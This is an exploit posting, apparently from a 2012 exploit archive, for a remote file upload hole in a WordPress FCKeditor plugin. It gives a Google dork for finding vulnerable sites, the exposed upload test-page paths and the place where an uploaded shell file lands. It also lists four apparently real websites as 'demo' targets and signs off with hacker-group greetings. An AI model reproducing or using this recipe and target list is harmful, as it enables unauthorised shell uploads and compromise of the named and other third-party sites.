#### # Exploit Title: WordPress deans with pwwangs code plugin for wordpress (FCKeditor) Remote File Upload # Author: T0x!c # Date : 28/03/2012 # Facebook Page: www.facebook.com/DzTem # E-mail: Malik_99@hotmail.fr # Category:: webapps # Google Dork: inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/" # Download: http://wordpress.org/extend/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/ # Version: 1.0.0 # Tested on: [Windows Xp] #### [ Vulnerable File ] http://127.0.0.1/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html or http://127.0.0.1/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html [ Shell ] http://127.0.0.1/UserFiles/YourFile.txt # Demo : http://cougardating.datingease.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/upload/test.html http://www.cereuswomen.com/podcast/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/uploadtest.html https://scandlearn.com/iphonebeta/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/test.html http://blog.nextlevelworship.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/test.html# =================================**AlgeriansHackers**================================== # Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov * (exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz) =======================================================================================